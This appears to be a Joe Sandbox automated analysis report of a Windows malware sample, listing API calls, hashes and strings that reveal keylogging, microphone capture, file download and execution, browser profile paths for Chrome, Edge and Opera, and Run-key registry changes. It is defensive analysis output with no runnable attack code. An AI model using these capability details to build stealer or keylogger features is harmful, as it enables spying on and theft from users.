                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: ACP$OCP
                                • API String ID: 0-711371036
                                • Opcode ID: 9e0df5bdb224d2be14a0cd5949da06f0ee57b11af7c7271d7bdd2cdd18eeb32c
                                • Instruction ID: fc24b39bc158c677debbea649066bee6e1bba6d32f28379ebc1c8ba741b2d3ba
                                • Opcode Fuzzy Hash: 9e0df5bdb224d2be14a0cd5949da06f0ee57b11af7c7271d7bdd2cdd18eeb32c
                                • Instruction Fuzzy Hash: BA217D22A4010063DB34CF54C940B9B326ADF50B27F568166ED09C7322F73AED44C39C
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • WriteFile.KERNEL32(?,?,?,?,00000000,FF8BC35D,00000000,?,PkGNG,0044BB6E,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 0044B7DB
                                • GetLastError.KERNEL32 ref: 0044B804
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: ErrorFileLastWrite
                                • String ID: PkGNG
                                • API String ID: 442123175-263838557
                                • Opcode ID: e2af8d231f6539d56f2593d6ace3ed0d4bab48f660b2d85d051dab4aa689f9d2
                                • Instruction ID: 56933c973e2243a1a9a6e47b5ff38ff3048756f5123006952a384074424e161b
                                • Opcode Fuzzy Hash: e2af8d231f6539d56f2593d6ace3ed0d4bab48f660b2d85d051dab4aa689f9d2
                                • Instruction Fuzzy Hash: 12319331A00619DBCB24CF59CD809DAB3F9EF88311F1445AAE509D7361D734ED81CB68
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • WriteFile.KERNEL32(?,?,?,?,00000000,FF8BC35D,00000000,?,PkGNG,0044BB8E,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 0044B6ED
                                • GetLastError.KERNEL32 ref: 0044B716
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: ErrorFileLastWrite
                                • String ID: PkGNG
                                • API String ID: 442123175-263838557
                                • Opcode ID: 51546446b41bf805027a94335c0e64e4fe702750584376849c5da3291fd64da6
                                • Instruction ID: 12ef57d8ab414bd2a6c5914f5c8b73f84ca543b1ee1fc2f1adbb6bb6aefc8993
                                • Opcode Fuzzy Hash: 51546446b41bf805027a94335c0e64e4fe702750584376849c5da3291fd64da6
                                • Instruction Fuzzy Hash: 6C21B435600219DFCB14CF69C980BE9B3F8EB48302F1044AAE94AD7351D734ED81CB64
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • SHCreateMemStream.SHLWAPI(00000000,00000000,?,?,?,00000000), ref: 00418BAA
                                  • Part of subcall function 00418656: GdipLoadImageFromStream.GDIPLUS(?,?,?,00418AD1,00000000,?,?,?,?,00000000), ref: 0041866A
                                • SHCreateMemStream.SHLWAPI(00000000,00000000,00000000,?,?,?,?,00000000), ref: 00418BCF
                                  • Part of subcall function 004186CB: GdipSaveImageToStream.GDIPLUS(?,?,?,?,00000000,00418B27,00000000,?,?), ref: 004186DD
                                  • Part of subcall function 00418679: GdipDisposeImage.GDIPLUS(?,00418B82), ref: 00418682
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: Stream$GdipImage$Create$DisposeFromLoadSave
                                • String ID: image/png
                                • API String ID: 1291196975-2966254431
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • GetLocalTime.KERNEL32(?,00475598,?,00000000,?,?,?,?,?,?,00415CC9,?,00000001,0000004C,00000000), ref: 00405030
                                  • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                • GetLocalTime.KERNEL32(?,00475598,?,00000000,?,?,?,?,?,?,00415CC9,?,00000001,0000004C,00000000), ref: 00405087
                                Strings
                                • KeepAlive | Enabled | Timeout: , xrefs: 0040501F
                                Yara matches
                                Similarity
                                • API ID: LocalTime
                                • String ID: KeepAlive | Enabled | Timeout:
                                • API String ID: 481472006-1507639952
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • Sleep.KERNEL32 ref: 00416640
                                • URLDownloadToFileW.URLMON(00000000,00000000,00000002,00000000,00000000), ref: 004166A2
                                Strings
                                Yara matches
                                Similarity
                                • API ID: DownloadFileSleep
                                • String ID: !D@
                                • API String ID: 1931167962-604454484
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • PathFileExistsW.SHLWAPI(00000000), ref: 0041AD3C
                                Strings
                                Yara matches
                                Similarity
                                • API ID: ExistsFilePath
                                • String ID: alarm.wav$hYG
                                • API String ID: 1174141254-2782910960
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                  • Part of subcall function 0040B164: GetLocalTime.KERNEL32(?,Offline Keylogger Started,004750F0), ref: 0040B172
                                  • Part of subcall function 0040B164: wsprintfW.USER32 ref: 0040B1F3
                                  • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                • CloseHandle.KERNEL32(?), ref: 0040B0B4
                                • UnhookWindowsHookEx.USER32 ref: 0040B0C7
                                Strings
                                Yara matches
                                Similarity
                                • API ID: LocalTime$CloseHandleHookUnhookWindowswsprintf
                                • String ID: Online Keylogger Stopped
                                • API String ID: 1623830855-1496645233
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,73E85006,00000001,?,0043CE55), ref: 00448C24
                                Strings
                                Yara matches
                                Similarity
                                • API ID: String
                                • String ID: LCMapStringEx$PkGNG
                                • API String ID: 2568140703-1065776982
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • waveInPrepareHeader.WINMM(0077F7B0,00000020,?,?,00476B50,00474EE0,?,00000000,00401A15), ref: 00401849
                                • waveInAddBuffer.WINMM(0077F7B0,00000020,?,00000000,00401A15), ref: 0040185F
                                Strings
                                Yara matches
                                Similarity
                                • API ID: wave$BufferHeaderPrepare
                                • String ID: hpw
                                • API String ID: 2315374483-1490804451
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Strings
                                Yara matches
                                Similarity
                                • API ID: _free
                                • String ID: $G
                                • API String ID: 269201875-4251033865
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • IsValidLocale.KERNEL32(00000000,JD,00000000,00000001,?,?,00444AEA,?,?,004444CA,?,00000004), ref: 00448B32
                                Strings
                                Yara matches
                                Similarity
                                • API ID: LocaleValid
                                • String ID: IsValidLocaleName$JD
                                • API String ID: 1901932003-2234456777
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Google\Chrome\,00000000), ref: 0040C4F6
                                Strings
                                Yara matches
                                Similarity
                                • API ID: ExistsFilePath
                                • String ID: UserProfile$\AppData\Local\Google\Chrome\
                                • API String ID: 1174141254-4188645398
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Microsoft\Edge\,00000000), ref: 0040C559
                                Strings
                                Yara matches
                                Similarity
                                • API ID: ExistsFilePath
                                • String ID: UserProfile$\AppData\Local\Microsoft\Edge\
                                • API String ID: 1174141254-2800177040
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • PathFileExistsW.SHLWAPI(00000000,\Opera Software\Opera Stable\,00000000), ref: 0040C5BC
                                Strings
                                Yara matches
                                Similarity
                                • API ID: ExistsFilePath
                                • String ID: AppData$\Opera Software\Opera Stable\
                                • API String ID: 1174141254-1629609700
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Strings
                                Yara matches
                                Similarity
                                • API ID: _free
                                • String ID: $G
                                • API String ID: 269201875-4251033865
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • GetKeyState.USER32(00000011), ref: 0040B64B
                                  • Part of subcall function 0040A3E0: GetForegroundWindow.USER32 ref: 0040A416
                                  • Part of subcall function 0040A3E0: GetWindowThreadProcessId.USER32(00000000,?), ref: 0040A422
                                  • Part of subcall function 0040A3E0: GetKeyboardLayout.USER32(00000000), ref: 0040A429
                                  • Part of subcall function 0040A3E0: GetKeyState.USER32(00000010), ref: 0040A433
                                  • Part of subcall function 0040A3E0: GetKeyboardState.USER32(?), ref: 0040A43E
                                  • Part of subcall function 0040A3E0: ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 0040A461
                                  • Part of subcall function 0040A3E0: ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 0040A4C1
                                  • Part of subcall function 0040A636: SetEvent.KERNEL32(00000000,?,00000000,0040B20A,00000000), ref: 0040A662
                                Strings
                                Yara matches
                                Similarity
                                • API ID: State$KeyboardUnicodeWindow$EventForegroundLayoutProcessThread
                                • String ID: [AltL]$[AltR]
                                • API String ID: 2738857842-2658077756
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • GetOEMCP.KERNEL32(00000000,?,?,0044EF75,?), ref: 0044ED17
                                • GetACP.KERNEL32(00000000,?,?,0044EF75,?), ref: 0044ED2E
                                Strings
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: uD
                                • API String ID: 0-2547262877
                                • Opcode ID: b77d3b663c6aed767531e5de151c2f7480185761a2f62c70c64f4560ad89233a
                                • Instruction ID: 19c10458df6b4aed5d20bc802b22671fd2b069e30d3a1616a3713fc20edc201d
                                • Opcode Fuzzy Hash: b77d3b663c6aed767531e5de151c2f7480185761a2f62c70c64f4560ad89233a
                                • Instruction Fuzzy Hash: A5F0C871800105CBEB20DB55DC897697771BF11335F144755E4394A6E2C7B98C81CF49
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • GetSystemTimeAsFileTime.KERNEL32(00000000,0043AAB7), ref: 00448996
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: Time$FileSystem
                                • String ID: GetSystemTimePreciseAsFileTime$PkGNG
                                • API String ID: 2086374402-949981407
                                • Opcode ID: 14ade04f60bc73be69f0a8e2d41fd66075f217d790f0afe8d3aaf6a6c36f91f3
                                • Instruction ID: 0ece642104574987c61f359f6ab52f67772cb5eafdc88f944851b8b866d171c2
                                • Opcode Fuzzy Hash: 14ade04f60bc73be69f0a8e2d41fd66075f217d790f0afe8d3aaf6a6c36f91f3
                                • Instruction Fuzzy Hash: 55E0E571A41718E7D710AB259C02E7EBB54DB44B02B10027EFC0957382DE285D0496DE
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000000), ref: 004161A8
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExecuteShell
                                • String ID: !D@$open
                                • API String ID: 587946157-1586967515
                                • Opcode ID: bb18f393a94152f83cce48417cccfa788a776dd848670c049a324d78068a8282
                                • Instruction ID: 73504a7432a82bf20c2cd712858cac99996ed9f8eaf32da6c0f13d1c3fa6c831
                                • Opcode Fuzzy Hash: bb18f393a94152f83cce48417cccfa788a776dd848670c049a324d78068a8282
                                • Instruction Fuzzy Hash: 2FE0ED712483059AD614EA72DC91AFE7358AB54755F40083FF506514E2EE3C5849C65A
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • ___initconout.LIBCMT ref: 0045555B
                                  • Part of subcall function 00456B1D: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00455560,00000000,PkGNG,0044B59D,?,FF8BC35D,00000000,?,00000000), ref: 00456B30
                                • WriteConsoleW.KERNEL32(FFFFFFFE,FF8BC369,00000001,00000000,00000000,00000000,PkGNG,0044B59D,?,FF8BC35D,00000000,?,00000000,PkGNG,0044BB19,?), ref: 0045557E
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: ConsoleCreateFileWrite___initconout
                                • String ID: PkGNG
                                • API String ID: 3087715906-263838557
                                • Opcode ID: 4fd586c33a7e536def3848490aff3c82696797501ee569242fdde9145b290049
                                • Instruction ID: e84ccb038854987deafcb7b601af55b429ad8f27f18c1f17be9b2782bd97289a
                                • Opcode Fuzzy Hash: 4fd586c33a7e536def3848490aff3c82696797501ee569242fdde9145b290049
                                • Instruction Fuzzy Hash: 10E02B70500508BBD610CB64DC25EB63319EB003B1F600315FE25C72D1EB34DD44C759
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • GetKeyState.USER32(00000012), ref: 0040B6A5
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: State
                                • String ID: [CtrlL]$[CtrlR]
                                • API String ID: 1649606143-2446555240
                                • Opcode ID: c765968ff3d10558f6a95e5840c5c1bc63f6cd989c8fe2dffd6df2c532e6808f
                                • Instruction ID: bec5627f59812d2efb235ad4bfa8f6d19d2d97b3e0140e65676d9d4505e8418d
                                • Opcode Fuzzy Hash: c765968ff3d10558f6a95e5840c5c1bc63f6cd989c8fe2dffd6df2c532e6808f
                                • Instruction Fuzzy Hash: 6FE04F2160021052C524363D5A1E67D2911CB52754B42096FF882A76CADEBF891543CF
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                  • Part of subcall function 00434770: __onexit.LIBCMT ref: 00434776
                                • __Init_thread_footer.LIBCMT ref: 00410F29
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: Init_thread_footer__onexit
                                • String ID: ,kG$0kG
                                • API String ID: 1881088180-2015055088
                                • Opcode ID: 55ded91c2411799c93627b1e27181bc6755349442ad5772556d3e3dbb5a5a571
                                • Instruction ID: c595ded0a674a2b9ccc74dbc71d20adb946c68f5a758ea4f5ad5526f3cc50642
                                • Opcode Fuzzy Hash: 55ded91c2411799c93627b1e27181bc6755349442ad5772556d3e3dbb5a5a571
                                • Instruction Fuzzy Hash: 35E0D8312149208EC214A32995829C93791DB4E335B61412BF414D72D5CBAEB8C1CA1D
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00000000,00000002,?,80000002,80000002,0040D4CE,00000000,?,00000000), ref: 00413A31
                                • RegDeleteValueW.ADVAPI32(?,?,?,00000000), ref: 00413A45
                                Strings
                                • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 00413A2F
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: DeleteOpenValue
                                • String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
                                • API String ID: 2654517830-1051519024
                                • Opcode ID: 37389d7ee51bec1c2129a7b253fd7a72f11d6a1cc032b6ab4e225ceb9c6d243b
                                • Instruction ID: 6fb421a43559def270d35797bbb86f7c8bc210cd52a17bc53693ea6618a40a87
                                • Opcode Fuzzy Hash: 37389d7ee51bec1c2129a7b253fd7a72f11d6a1cc032b6ab4e225ceb9c6d243b
                                • Instruction Fuzzy Hash: 99E0C23124420CFBDF104F71DD06FFA376CDB01F42F1006A5BA0692091C626DF049668
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • DeleteFileW.KERNEL32(00000000,?,?,0040ACB3,0000005C,?,?,?,00000000), ref: 0040B876
                                • RemoveDirectoryW.KERNEL32(00000000,?,?,0040ACB3,0000005C,?,?,?,00000000), ref: 0040B8A1
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: DeleteDirectoryFileRemove
                                • String ID: hdF
                                • API String ID: 3325800564-665520524
                                • Opcode ID: df808ba8ebf8d5c0a6d1b72abb8ee9cce7734050c17300acf0bbb65a0f0efe9c
                                • Instruction ID: 8281cfb8de641f04b50c20d0c8e921e0d4b8d2282f61a3be21f0805504db5409
                                • Opcode Fuzzy Hash: df808ba8ebf8d5c0a6d1b72abb8ee9cce7734050c17300acf0bbb65a0f0efe9c
                                • Instruction Fuzzy Hash: 45E046321007119BCB14AB258C48AD6339CAF0031AF00486FA492A32A1DF38AC09CAA8
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: CommandLine
                                • String ID: `&v
                                • API String ID: 3253501508-3442361631
                                • Opcode ID: 21ebb353eb9a5e230f63c7dd18cef58b922ecce08ae36afe23ca5bbaac6cd083
                                • Instruction ID: 694146ce0b361bd31d1980ce40e18c0a636997d79f12e70286e675221abc8fda
                                • Opcode Fuzzy Hash: 21ebb353eb9a5e230f63c7dd18cef58b922ecce08ae36afe23ca5bbaac6cd083
                                • Instruction Fuzzy Hash: CBB04878800753CB97108F21AA0C0853FA0B30820238020B6940A92A21EB7885868A08
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00401D55), ref: 00440D27
                                • GetLastError.KERNEL32 ref: 00440D35
                                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00440D90
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: ByteCharMultiWide$ErrorLast
                                • String ID:
                                • API String ID: 1717984340-0
                                • Opcode ID: a909a75f279edaa9992fcfd87f44a9f238bfc46e7277e37c8624290a99980dba
                                • Instruction ID: f204e272a103731937cf510deb2d9f687334ef06d731906aa630a644c7418207
                                • Opcode Fuzzy Hash: a909a75f279edaa9992fcfd87f44a9f238bfc46e7277e37c8624290a99980dba
                                • Instruction Fuzzy Hash: BA411871A00206EFEF218FA5C8447AB7BA5EF45310F10816BFA549B3A1DB38AD25C759
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • IsBadReadPtr.KERNEL32(?,00000014,00000000,00000000,00000001,?,?,?,00411EF0), ref: 00411B8C
                                • IsBadReadPtr.KERNEL32(?,00000014,00411EF0), ref: 00411C58
                                • SetLastError.KERNEL32(0000007F), ref: 00411C7A
                                • SetLastError.KERNEL32(0000007E,00411EF0), ref: 00411C91
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: ErrorLastRead
                                • String ID:
                                • API String ID: 4100373531-0
                                • Opcode ID: 46f42941f51e653cdae40cd00269a703bf4e12df5cc4a1911c605fdb7767d4e6
                                • Instruction ID: 277f4bdee2933866d2d1c697a3b04f0a6a13197b354a533a519a822f1f8833ca
                                • Opcode Fuzzy Hash: 46f42941f51e653cdae40cd00269a703bf4e12df5cc4a1911c605fdb7767d4e6
                                • Instruction Fuzzy Hash: 37419C75244305DFE7248F18DC84BA7B3E8FB48711F00082EEA8A87661F739E845CB99
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Execution Graph

                                Execution Coverage:1.2%
                                Dynamic/Decrypted Code Coverage:0%
                                Signature Coverage:0%
                                Total number of Nodes:544
                                Total number of Limit Nodes:10
                                execution_graph 47016 434887 47017 434893 ___scrt_is_nonwritable_in_current_image 47016->47017 47042 434596 47017->47042 47019 43489a 47021 4348c3 47019->47021 47337 4349f9 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_get_show_window_mode 47019->47337 47030 434902 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 47021->47030 47338 444251 5 API calls __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 47021->47338 47023 4348dc 47025 4348e2 ___scrt_is_nonwritable_in_current_image 47023->47025 47339 4441f5 5 API calls __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 47023->47339 47026 434962 47053 434b14 47026->47053 47030->47026 47340 4433e7 35 API calls 4 library calls 47030->47340 47037 43498e 47039 434997 47037->47039 47341 4433c2 28 API calls _Atexit 47037->47341 47342 43470d 13 API calls 2 library calls 47039->47342 47043 43459f 47042->47043 47343 434c52 IsProcessorFeaturePresent 47043->47343 47045 4345ab 47344 438f31 10 API calls 4 library calls 47045->47344 47047 4345b0 47048 4345b4 47047->47048 47345 4440bf 47047->47345 47048->47019 47051 4345cb 47051->47019 47411 436e90 47053->47411 47056 434968 47057 4441a2 47056->47057 47413 44f059 47057->47413 47059 434971 47062 40e9c5 47059->47062 